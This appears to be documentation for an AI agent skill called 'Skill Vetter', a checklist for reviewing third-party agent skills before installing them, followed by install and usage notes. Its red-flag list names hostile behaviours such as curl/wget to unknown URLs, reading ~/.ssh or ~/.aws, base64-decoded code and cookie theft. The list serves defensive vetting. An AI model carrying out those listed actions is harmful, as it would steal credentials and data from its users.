skill-vetter

# Skill Vetter 🔒

Security-first vetting protocol for AI agent skills. **Never install a skill without vetting it first.**

## Problem Solved

Installing untrusted skills is dangerous:
- Malicious code can steal credentials
- Skills can exfiltrate data to external servers
- Obfuscated scripts can run arbitrary commands
- Typosquatted names can trick you into installing fakes

This skill provides a systematic vetting process before installation.

## When to Use

- **Before installing any skill from ClawHub**
- **Before running skills from GitHub repos**
- **When evaluating skills shared by other agents**
- **Anytime you're asked to install unknown code**

## Vetting Protocol

### Step 1: Source Check

Answer these questions:
- [ ] Where did this skill come from?
- [ ] Is the author known/reputable?
- [ ] How many downloads/stars does it have?
- [ ] When was it last updated?
- [ ] Are there reviews from other agents?

### Step 2: Code Review (MANDATORY)

Read **ALL** files in the skill. Check for these **RED FLAGS**:

```
🚨 REJECT IMMEDIATELY IF YOU SEE:
─────────────────────────────────────────
• curl/wget to unknown URLs
• Sends data to external servers
• Requests credentials/tokens/API keys
• Reads ~/.ssh, ~/.aws, ~/.config without clear reason
• Accesses MEMORY.md, USER.md, SOUL.md, IDENTITY.md
• Uses base64 decode on anything
• Uses eval() or exec() with external input
• Modifies system files outside workspace
• Installs packages without listing them
• Network calls to IPs instead of domains
• Obfuscated code (compressed, encoded, minified)
• Requests elevated/sudo permissions
• Accesses browser cookies/sessions
• Touches credential files
─────────────────────────────────────────
```

### Step 3: Permission Scope

Evaluate:
- [ ] What files does it need to read?
- [ ] What files does it need to write?
- [ ] What commands does it run?
- [ ] Does it need network access? To where?
- [ ] Is the scope minimal for its stated purpose?

**Principle of Least Privilege:*...

# Skill Vetter - Installation

Security-first vetting protocol for AI agent skills.

## Quick Install

```bash
# Via ClawHub (when published)
clawhub install skill-vetter

# Or manual
cd ~/.openclaw/workspace/skills
# Download from ClawHub or extract package
```

## Usage

Before installing **any** skill:

```
You: "Vet the deep-research-pro skill from ClawHub"
Agent: [Downloads to temp dir, reviews code, checks for red flags]
Agent: [Produces vetting report with risk level and verdict]
```

## What It Checks

- ✅ Source reputation (downloads, stars, author)
- ✅ Code review (red flag detection)
- ✅ Permission scope (files, network, commands)
- ✅ Risk classification (LOW/MEDIUM/HIGH/EXTREME)

## Red Flags (Auto-Reject)

- curl/wget to unknown URLs
- Credential/API key theft attempts
- Obfuscated code (base64, minified)
- sudo/root access requests
- Network calls to IP addresses
- Access to ~/.ssh, ~/.aws, etc.

## Vetting Report Example

```
SKILL VETTING REPORT
═══════════════════════════════════════
Skill: example-skill
Source: ClawHub
RED FLAGS: None
PERMISSIONS: Read/write workspace only
RISK LEVEL: 🟢 LOW
VERDICT: ✅ SAFE TO INSTALL
═══════════════════════════════════════
```

## Integration

**Works with:**
- **zero-trust-protocol:** Enforces verification flow
- **drift-guard:** Logs vetting decisions

## Requirements

- `curl` (for GitHub API checks)
- `jq` (for JSON parsing)

## License

MIT - Free to use, modify, distribute.

---

**Never install untrusted code. Vet first.**